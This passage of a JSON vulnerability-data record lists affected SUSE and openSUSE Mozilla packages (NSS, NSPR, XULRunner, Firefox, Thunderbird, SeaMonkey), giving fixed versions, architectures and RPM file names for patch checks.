Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.0.1-4.3.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-4.3.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-translations-other-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", 